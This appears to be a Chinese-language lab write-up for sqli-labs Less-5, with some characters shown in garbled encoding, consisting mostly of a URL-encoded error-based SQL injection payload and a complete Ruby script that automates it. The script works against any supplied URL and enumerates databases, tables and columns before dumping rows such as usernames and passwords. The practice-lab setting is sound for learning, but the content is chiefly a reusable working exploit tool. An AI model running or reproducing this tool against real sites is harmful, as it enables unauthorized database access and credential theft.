測(cè)試目標(biāo)位 sqli-labs 第五節(jié)
eg:
http://ip/Less-5/?id=1%27%20+and(select%201%20from(select%20count(),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,column_name,0x7e)%20FROM%20information_schema.columns%20where%20table_name=0x656d61696c73%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)2))x%20from%20information_schema.tables%20group%20by%20x)a)%20--+
Paste_Image.png
寫個(gè)程序跑一下
#sqlError.rb --dbs url
#sqlError.rb --tables -D databasename url
#sqlError.rb --columns -T tablename -D databasename url
#sqlError.rb --dump -C 'id,username,password' -T tablename -D databasename url
require 'net/http'
url = ARGV[0]
$base_payload = "'+and(select 1 from(select count(*),concat((select (select ($sql)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+"
class String
def to_hex; '0x'+self.unpack("H*")[0].to_s; end
end
#Send Request Get Response
def send_sqli(url,payload)
uri = URI.parse(url)
query = uri.query
uri.query = query+payload
http = Net::HTTP.new(uri.host,uri.port)
http.use_ssl = true if uri.scheme == 'https'
request = Net::HTTP::Get.new(uri.request_uri)
request['User-Agent'] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"
request['Connection'] = "keep-alive"
request['Accept-Language'] = "en-US,en;q=0.5"
request['Accept-Encoding'] = "gzip,deflate"
begin
puts "Sending......"
response = http.request(request).body
rescue Exception => e
puts "[!] Failed!"
puts e
end
end
def printDataNum(title,num)
puts "[!] Received #{title} Number From Remote Server : #{num}"
end
def printData(number,dataAry)
puts "Received Number #{number}"
dataAry.each { |name| puts '|' + name + "|\n" }
end
def printOne(data)
puts "[!] Received Data From Remote Server : #{data}"
end
def replace(content)
$base_payload.sub(/\$sql/,content)
end
def getResult(content)
content.scan(/~(.*?)~/)[0][0]
end
def getDatabaseNum(url)
sql = "SELECT concat(0x7e,count(distinct+table_schema),0x7e) FROM information_schema.tables"
payload = replace(sql)
html = send_sqli url,payload
database_number = getResult html
printDataNum 'Databases',database_number
return database_number
end
#Get all databases
def getAllDatabases(url)
databases = []
number = getDatabaseNum url
number.to_i.times.each do |i|
sql = "select distinct concat(0x7e, table_schema, 0x7e) from information_schema.tables limit #{i},1"
payload = replace(sql)
html = send_sqli url,payload
database_name = getResult html
databases << database_name
printOne database_name
end
printData number,databases
end
def getTablesNum(url,database)
sql = "select concat(0x7e, count(table_name), 0x7e) from information_schema.tables where table_schema=#{database}"
payload = replace(sql)
html = send_sqli url,payload
tables_number = getResult html
printDataNum 'Tables',tables_number
return tables_number
end
def getAlltables(url,database)
tables = []
number = getTablesNum url,database
number.to_i.times.each do |i|
sql = "select concat(0x7e, table_name, 0x7e) from information_schema.tables where table_schema=#{database} limit #{i},1"
payload = replace(sql)
html = send_sqli url,payload
table_name = getResult html
tables << table_name
printOne table_name
end
printData number,tables
end
def getColumnsNum(url,table,database)
sql = "select concat(0x7e, count(column_name), 0x7e) from information_schema.columns where table_name=#{table} and table_schema=#{database}"
payload = replace(sql)
html = send_sqli url,payload
columns_number = getResult html
printDataNum 'Columns',columns_number
return columns_number
end
def getAllcolumns(url,table,database)
columns = []
number = getColumnsNum url,table,database
number.to_i.times.each do |i|
sql = "SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=#{table} and table_schema=#{database} LIMIT #{i},1"
payload = replace(sql)
html = send_sqli url,payload
column_name = getResult html
columns << column_name
printOne column_name
end
printData number,columns
end
def getDataNum(url,table,database)
sql = "select concat(0x7e, count(*), 0x7e) from #{database}.#{table}"
payload = replace(sql)
puts payload
html = send_sqli url,payload
data_number = getResult html
printDataNum 'Data',data_number
return data_number
end
def getAlldata(url,columns,table,database)
alldata = []
number = getDataNum(url,table,database)
number.to_i.times.each do |i|
sql = "select concat(0x7e,id, 0x20,#{columns},0x7e) from #{database}.#{table} limit #{i},1"
payload = replace(sql)
html = send_sqli url,payload
data = getResult html
alldata << data
printOne data
end
printData number,alldata
end
if __FILE__ == $0
case ARGV[0]
when '--dbs'
url = ARGV[1]
getAllDatabases url
when '--tables'
url = ARGV[3]
database = ARGV[2]
database = database.to_hex
getAlltables url,database
when '--columns'
url = ARGV[5]
table = ARGV[2]
database = ARGV[4]
table = table.to_hex
database = database.to_hex
getAllcolumns url,table,database
when '--dump'
url = ARGV[7]
columns = ARGV[2]
table = ARGV[4]
database = ARGV[6]
getAlldata url,columns,table,database
end
end
windows 上做的測(cè)試
Paste_Image.png
